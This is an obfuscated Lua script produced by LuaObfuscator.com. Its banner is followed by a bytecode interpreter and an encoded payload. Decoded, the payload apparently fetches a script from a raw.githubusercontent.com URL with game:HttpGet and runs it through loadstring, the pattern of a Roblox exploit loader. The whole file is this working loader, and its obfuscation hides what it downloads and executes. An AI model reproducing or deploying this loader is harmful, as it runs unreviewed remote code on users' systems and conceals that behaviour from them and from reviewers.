--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v77=(v31/((79 -(26 + 51))^(v32-(1569 -(1426 + 124 + 18)))))%((1762 -(1144 + 430 + 186))^(((v33-(1 + 0)) -(v32-(1184 -(409 + 774)))) + 1)) ;return v77-(v77%(2 -1)) ;else local v78=0 + 0 ;local v79;while true do if (v78==(0 -0)) then v79=(1429 -(1041 + (473 -(47 + 40))))^(v32-(3 -2)) ;return (((v31%(v79 + v79))>=v79) and (2 -1)) or 0 ;end end end end v22=nil;v18=2;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v34)if (v1(v34,2)==79) then v20=v0(v3(v34,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v34,16));if v20 then local v99=0;local v100;while true do if (v99==0) then v100=v5(v81,v20);v20=nil;v99=1;end if (v99==1) then return v100;end end else return v81;end break;end end end end);v18=1;end if (v18==2) then function v22()local v35=622 -(17 + 605) ;local v36;while true do if (v35==(926 -(33 + 893))) then v36=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v35=1209 -(1112 + 96) ;end if (((2 -1) -0)==v35) then return v36;end end end v23=nil;function v23()local v37,v38=v1(v16,v19,v19 + (489 -(179 + 308)) );v19=v19 + 1 + 1 ;return (v38 * (1103 -847)) + v37 ;end v18=3;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v39==0) then v40=1051 -(39 + 1012) ;v41=nil;v39=1 + 0 ;end if (v39~=1) then else v42=nil;v43=nil;v39=2;end if (v39~=2) then else v44=nil;v45=nil;v39=2 + 1 ;end if (v39==4) then v48=nil;while true do if (v40==(905 -(147 + 755))) then v47=nil;v48=nil;v40=437 -(247 + 186) ;end if (v40==(1 + 1)) then v45=nil;v46=nil;v40=3;end if (v40~=4) then else while true do if (v41~=0) then else local v105=0;while true do if (v105~=0) then else v42=1748 -(1530 + 218) ;v43=nil;v105=1;end if (v105==(159 -(36 + 122))) then v41=1;break;end end end if (1==v41) then local v106=0;while true do if (1==v106) then v41=2;break;end if (v106==0) then local v111=0 -0 ;while true do if (v111==0) then v44=nil;v45=nil;v111=2 -1 ;end if (v111~=1) then else v106=1;break;end end end end end if (v41==(2 -0)) then local v107=0;local v108;while true do if (v107==0) then v108=0;while true do if (1==v108) then v41=1139 -(493 + 643) ;break;end if ((1919 -(1369 + 550))==v108) then local v113=0;while true do if (0==v113) then v46=nil;v47=nil;v113=1 + 0 ;end if (v113==(1 -0)) then v108=244 -(179 + 64) ;break;end end end end break;end end end if (v41==3) then v48=nil;while true do local v109=0;local v110;while true do if ((1178 -(241 + 937))==v109) then v110=0;while true do if (v110==(1 + 0)) then if (v42==2) then local v116=0 + 0 ;local v117;local v118;while true do if (1~=v116) then else while true do if (v117==(621 -(261 + 360))) then v118=0;while true do if (v118~=1) then else for v165=1,v24() do local v166=0;local v167;local v168;local v169;while true do if ((1 + 0)==v166) then v169=nil;while true do if (v167~=0) then else v168=0 -0 ;v169=nil;v167=1;end if (v167~=(2 -1)) then else while true do if (0==v168) then v169=v22();if (v21(v169,1,1)==0) then local v185=0 -0 ;local v186;local v187;local v188;local v189;local v190;while true do if (v185~=(2 -1)) then else v188=nil;v189=nil;v185=221 -(89 + 130) ;end if (v185~=0) then else v186=0;v187=nil;v185=1388 -(503 + 884) ;end if (v185==(2 + 0)) then v190=nil;while true do if (v186==(0 + 0)) then local v195=0;while true do if (v195~=(0 -0)) then else local v196=0 + 0 ;while true do if (v196~=1) then else v195=134 -(51 + 82) ;break;end if (0==v196) then v187=0 + 0 ;v188=nil;v196=1;end end end if (v195==1) then v186=1;break;end end end if (v186==1) then v189=nil;v190=nil;v186=2;end if (v186~=2) then else while true do if (v187==(614 -(94 + 518))) then local v197=0;while true do if (v197~=0) then else if (v21(v189,1,1)==1) then v190[1 + 1 ]=v48[v190[1 + 1 ]];end if (v21(v189,2,2)==1) then v190[1 + 2 ]=v48[v190[3]];end v197=1383 -(1345 + 37) ;end if (v197==(1 -0)) then v187=1 + 2 ;break;end end end if (v187==(4 -1)) then if (v21(v189,3 + 0 ,876 -(388 + 485) )~=(2 -1)) then else v190[4]=v48[v190[4]];end v43[v165]=v190;break;end if (v187==0) then local v199=0 + 0 ;local v200;while true do if (v199==(1329 -(1289 + 40))) then v200=827 -(714 + 113) ;while true do if (v200==0) then local v209=0 -0 ;while true do if (v209==1) then v200=2 -1 ;break;end if (v209~=(0 -0)) then else v188=v21(v169,2,3);v189=v21(v169,2 + 2 ,625 -(288 + 331) );v209=1955 -(1431 + 523) ;end end end if (v200~=1) then else v187=1 + 0 ;break;end end break;end end end if (v187==1) then local v201=0 + 0 ;local v202;while true do if (v201==0) then v202=0;while true do if (0==v202) then v190={v23(),v23(),nil,nil};if (v188==0) then local v210=0;local v211;local v212;while true do if (v210~=1) then else while true do if (v211~=0) then else v212=0;while true do if ((1041 -(645 + 396))~=v212) then else v190[1973 -(261 + 1709) ]=v23();v190[4]=v23();break;end end break;end end break;end if (v210==0) then v211=0 + 0 ;v212=nil;v210=1;end end elseif (v188==1) then v190[1779 -(1237 + 539) ]=v24();elseif (v188==2) then v190[3]=v24() -(2^16) ;elseif (v188~=(294 -(261 + 30))) then else local v215=0 + 0 ;local v216;local v217;while true do if (v215~=(190 -(60 + 129))) then else while true do if (v216==(0 + 0)) then v217=0;while true do if (v217==0) then v190[13 -10 ]=v24() -(2^16) ;v190[4]=v23();break;end end break;end end break;end if (v215~=(0 + 0)) then else v216=0 + 0 ;v217=nil;v215=3 -2 ;end end end v202=1;end if (1==v202) then v187=2;break;end end break;end end end end break;end end break;end end end break;end end break;end end break;end if (v166~=(735 -(202 + 533))) then else v167=0 -0 ;v168=nil;v166=1 + 0 ;end end end v42=3 -0 ;break;end if (v118==(0 -0)) then for v170=1,v47 do local v171=0 + 0 ;local v172;local v173;local v174;while true do if (v171==(1935 -(814 + 1120))) then v174=nil;while true do if (v172==1) then if (v173==(1 + 0)) then v174=v22()~=(724 -(468 + 256)) ;elseif (v173==(510 -(54 + 454))) then v174=v25();elseif (v173==3) then v174=v26();end v48[v170]=v174;break;end if (v172~=0) then else local v180=0 -0 ;local v181;while true do if (0==v180) then v181=0 + 0 ;while true do if (v181~=(0 -0)) then else v173=v22();v174=nil;v181=1;end if (v181~=1) then else v172=1 + 0 ;break;end end break;end end end end break;end if (v171==0) then v172=0;v173=nil;v171=1;end end end v46[13 -10 ]=v22();v118=1;end end break;end end break;end if (0==v116) then v117=0 + 0 ;v118=nil;v116=1;end end end if (v42==(10 -7)) then local v119=0;local v120;local v121;while true do if (v119==1) then while true do if (v120==0) then v121=0 + 0 ;while true do local v154=0 + 0 ;local v155;while true do if ((0 -0)==v154) then v155=0;while true do if ((0 -0)==v155) then if (v121~=1) then else return v46;end if (v121==(1825 -(1164 + 661))) then local v177=0;while true do if (v177~=0) then else local v184=0;while true do if (1~=v184) then else v177=1 + 0 ;break;end if (v184==0) then for v191=2 -1 ,v24() do v44[v191-1 ]=v29();end for v193=921 -(477 + 443) ,v24() do v45[v193]=v24();end v184=1 + 0 ;end end end if (v177~=1) then else v121=3 -2 ;break;end end end break;end end break;end end end break;end end break;end if (v119~=(721 -(618 + 103))) then else v120=0 + 0 ;v121=nil;v119=1;end end end break;end if (v110==(539 -(114 + 425))) then local v115=0 + 0 ;while true do if (v115==0) then local v142=444 -(426 + 18) ;while true do if (0~=v142) then else if (v42==(0 + 0)) then local v143=0;local v144;while true do if (v143==0) then v144=0;while true do if (v144~=(1930 -(1144 + 785))) then else v45={};v42=3 -2 ;break;end if (v144==(1122 -(635 + 487))) then local v175=0 -0 ;while true do if (v175==(4 -3)) then v144=1;break;end if (v175~=0) then else local v178=863 -(358 + 505) ;while true do if (v178~=(1548 -(374 + 1173))) then else v175=1;break;end if (v178~=(584 -(51 + 533))) then else v43={};v44={};v178=1;end end end end end end break;end end end if (v42==(4 -3)) then local v145=0;local v146;while true do if (v145==(712 -(586 + 126))) then v146=0;while true do if (v146==(0 + 0)) then local v176=0 -0 ;while true do if (v176==(0 + 0)) then v46={v43,v44,nil,v45};v47=v24();v176=1;end if (v176==1) then v146=1;break;end end end if ((154 -(97 + 56))==v146) then v48={};v42=1042 -(763 + 277) ;break;end end break;end end end v142=769 -(88 + 680) ;end if ((1 + 0)==v142) then v115=1;break;end end end if (v115~=1) then else v110=1 -0 ;break;end end end end break;end end end break;end end break;end if (v40==0) then local v93=847 -(790 + 57) ;while true do if (v93==(1403 -(1166 + 237))) then v41=0;v42=nil;v93=1 + 0 ;end if (v93==1) then v40=1;break;end end end if (v40==(1547 -(115 + 1431))) then local v94=0;while true do if (v94==0) then v43=nil;v44=nil;v94=1 + 0 ;end if (v94==(1 + 0)) then v40=2;break;end end end end break;end if (v39~=3) then else v46=nil;v47=nil;v39=4;end end end v30=nil;v18=7;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (3==v18) then v24=nil;function v24()local v49=(0 -0) + 0 ;local v50;local v51;local v52;local v53;while true do if (v49==(1495 -(264 + 1086 + 145))) then v50,v51,v52,v53=v1(v16,v19,v19 + (10 -(361 -(268 + 86))) );v19=v19 + 3 + 1 ;v49=1;end if (v49==((969 -(376 + 592)) + 0)) then return (v53 * (16778017 -(266 + 535))) + (v52 * (142735 -77199)) + (v51 * 256) + v50 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v54,v55,v56)local v57=v54[1];local v58=v54[2];local v59=v54[3];return function(...)local v69=0;local v70;local v71;local v72;local v73;local v74;while true do if (v69==2) then v74=nil;function v74()local v83=v57;local v84=v58;local v85=v59;local v86=v28;local v87={};local v88={};local v89={};for v95=0 + (1567 -(411 + 1156)) ,v73 do if (((2618 -((321 -192) + 500))>=399) and (v95>=v85)) then v87[v95-v85 ]=v72[v95 + (3 -2) + 0 ];else v89[v95]=v72[v95 + (1933 -(592 + 1340)) ];end end local v90=(v73-v85) + (4 -3) ;local v91;local v92;while true do local v96=(0 -0) -0 ;local v97;while true do if (((5515 -(88 + 431))>(724 -326)) and ((1587 -(1345 + 242))==v96)) then v97=1127 -(94 + 1033) ;while true do if ((v97==((2 -0) -1)) or ((1457 + 1338)<(4 + 88))) then if ((v92<=2) or ((6641 -3447)>(4041 + 474))) then if ((v92<=(63 -(21 + 42))) or ((2136 -(679 + (1218 -(91 + 1067))))<(674 + 500))) then v89[v91[6 -4 ]]();elseif ((v92==(3 -2)) or ((951 -499)>=(4778 -(1142 + 45)))) then do return;end else v89[v91[8 -6 ]]=v91[4 -1 ];end elseif (((4243 -(929 + 165))<(6146 -(422 + 777))) and (v92<=(160 -(154 + 2)))) then if ((v92>(3 + 0)) or ((3990 -(310 + 173))<=(1145 + 646))) then local v124=0 -0 ;local v125;local v126;local v127;while true do if ((1091>(2641 -(1060 + (2657 -(1124 + 675))))) and (v124==(0 -(0 + 0)))) then v125=0 + 0 ;v126=nil;v124=(2 -1) + 0 ;end if ((v124==(1863 -(1607 + 255))) or ((3670 + 789)<=(5662 -3339))) then v127=nil;while true do if (((903 + 2921)<=(5185 -(55 + 216 + 474))) and (v125==(1 + (447 -(33 + 414))))) then v89[v126 + 1 + 0 ]=v127;v89[v126]=v127[v91[1 + 3 ]];break;end if ((v125==(0 -0)) or ((8083 -5216)<=(1733 -((670 -(81 + 2)) + 1001)))) then local v150=0 -0 ;while true do if ((v150==((3 -2) + 0)) or ((2836 -2028)>(8202 -5420))) then v125=793 -(323 + 469) ;break;end if (((4265 -(153 + 457))>((7296 -2238) -(1185 + 254))) and ((0 -0)==v150)) then v126=v91[1 + 1 ];v127=v89[v91[(3270 -(509 + 1462)) -(797 + 499) ]];v150=57 -(45 + 11) ;end end end end break;end end else local v128=1840 -(1538 + 302) ;local v129;local v130;local v131;while true do if (((0 + 0)==v128) or ((1479 + 3299)==(7 + 4343))) then v129=1768 -(534 + 1234) ;v130=nil;v128=(257 -(73 + 183)) + 0 ;end if ((((3411 -(522 + 531)) -(362 + (1419 -(1000 + 343))))<(479 + (4646 -(1093 + 235)))) and (v128==(1 + 0))) then v131=nil;while true do if (((12578 -8573)>(2538 + 1112)) and (v129==(1 -0))) then while true do if ((v130==(343 -(297 + 46))) or ((732 -276)>=(2294 -(227 + (194 -115))))) then v131=v91[408 -(121 + 285) ];v89[v131]=v89[v131](v13(v89,v131 + (840 -(777 + 62)) ,v71));break;end end break;end if ((v129==(0 -0)) or ((5125 -3635)>=(2667 -1045))) then local v151=(3261 -1335) -(788 + 1138) ;while true do if ((v151==(1472 -((2359 -(874 + 248)) + 234))) or ((1321 + 936)>=(4350 -(174 + 309 + 38)))) then v129=1 + (0 -0) ;break;end if (((2355 -(151 + (1372 -(463 + 836))))>(150 + 37)) and (v151==((569 -264) -(219 + (261 -175))))) then v130=0;v131=nil;v151=1 + 0 ;end end end end break;end end end elseif ((v92>(1390 -(573 + 812))) or ((947 -(100 + 172))==(433 + 268))) then v89[v91[1 + 1 ]]=v56[v91[6 -3 ]];else local v134=(0 -0) -0 ;local v135;local v136;local v137;local v138;local v139;while true do if (((269 + 1793)<=((12422 -8556) -(101 + 89))) and (v134==(1 + 0))) then v137=nil;v138=nil;v134=404 -(27 + 375) ;end if ((v134==(1 + 1)) or ((4973 -(248 + 325))<(1575 -(6 + 4 + 31)))) then v139=nil;while true do if ((v135==(1263 -(1019 + 244))) or (((8671 -(1609 + 379)) -4137)>(15203 -10459))) then v136=v91[(1 + 1) -(283 -(227 + 56)) ];v137,v138=v86(v89[v136](v13(v89,v136 + 1 + 0 ,v91[9 -(2 + 4) ])));v135=1 + 0 ;end if (((4085 -2430)>(2496 -(916 + 231))) and (v135==(2 -1))) then local v153=0 -0 ;while true do if (((2675 -(70 + 1765))<=(10113 -5916)) and (v153==(842 -(341 + 501)))) then v71=(v138 + v136) -(607 -(141 + 465)) ;v139=(7464 -5567) -(1736 + (1100 -(864 + 75))) ;v153=3 -2 ;end if (((5425 -3848)<((21187 -11550) -5797)) and (v153==((3423 -1425) -(1538 + 459)))) then v135=1 + 0 + 1 ;break;end end end if ((v135==(2 -0)) or ((6318 -(2735 + 1778))>((5423 -2859) -(114 + 39)))) then for v156=v136,v71 do local v157=0 + 0 ;local v158;local v159;while true do if ((v157==(1 -0)) or ((12540 -7932)>=(733 + 1823 + 2261))) then while true do if (((617 -203)<(3702 + 1214)) and (v158==(1591 -((2014 -732) + 309)))) then v159=0;while true do if (((455 + 2345)<(4758 -(944 + 769))) and (v159==(0 -0))) then v139=v139 + 1 + 0 ;v89[v156]=v137[v139];break;end end break;end end break;end if (((3004 + (3800 -1970))>3682) and (v157==(0 -0))) then v158=0;v159=nil;v157=927 -(461 + 465) ;end end end break;end end break;end if (((2198 + 1417)>(1040 -((1642 -(458 + 1133)) + 71))) and (v134==(0 + 0))) then v135=574 -(133 + (973 -532)) ;v136=nil;v134=1066 -(233 + 832) ;end end end v70=v70 + (116 -((174 -119) + 60)) ;break;end if ((v97==(0 + 0)) or (1463>(8550 -4956))) then local v112=0 + 0 ;while true do if ((((1342 + 646) -631)<(5709 -(407 + (2287 -(367 + 936))))) and (v112==(1893 -(168 + 1724)))) then v97=2 -1 ;break;end if ((v112==(0 + 0)) or ((3719 + 960)<=(8950 -5689))) then local v114=361 -(159 + 202) ;while true do if ((v114==(0 + 0)) or ((4594 -(786 + 433))<(11799 -8628))) then v91=v83[v70];v92=v91[(1 -0) + 0 ];v114=3 -2 ;end if ((v114==(1 + 0)) or ((2486 + 2099)<=(7138 -4299))) then v112=1 -0 ;break;end end end end end end break;end end end end v69=3;end if (v69==3) then A,B=v28(v11(v74));if  not A[1] then local v98=v54[4][v70] or "?" ;error("Script error at ["   .. v98   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v69==0) then v70=1;v71= -1;v69=1;end if (v69==1) then v72={...};v73=v12("#",...) -1 ;v69=2;end end end;end return v30(v29(),{},v17)(...);end if (v18==4) then function v25()local v60=v24();local v61=v24();local v62=1;local v63=(v21(v61,1160 -(25 + 111 + (2523 -1500)) ,12 + 8 ) * ((3 -1)^(1350 -(15 + 1303)))) + v60 ;local v64=v21(v61,62 -41 ,471 -(411 + (85 -56)) );local v65=((v21(v61,17 + 15 )==(1316 -(775 + 540))) and  -(1 + 0)) or (1 -0) ;if (v64==(0 -0)) then if (v63==0) then return v65 * (0 + 0) ;else v64=1 -0 ;v62=1183 -(140 + 1043) ;end elseif (v64==(5414 -3367)) then return ((v63==(0 -0)) and (v65 * ((1227 -(508 + 718))/0))) or (v65 * NaN) ;end return v8(v65,v64-(991 + 32) ) * (v62 + (v63/(((2 + 1) -(2 -1))^(116 -64)))) ;end v26=nil;function v26(v66)local v67;if  not v66 then local v82=0 -0 ;while true do if ((1319 -(1054 + 265))==v82) then v66=v24();if (v66==(0 + 0)) then return "";end break;end end end v67=v3(v16,v19,(v19 + v66) -(3 -(2 + 0)) );v19=v19 + v66 ;local v68={};for v75=1, #v67 do v68[v75]=v2(v1(v3(v67,v75,v75)));end return v6(v68);end v18=5;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5368652O733O682F6A6D657376322F6D61696E2F6A6D657300083O0012063O00013O001206000100023O002004000100010003001202000300044O0005000100034O00035O00026O000100012O00013O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
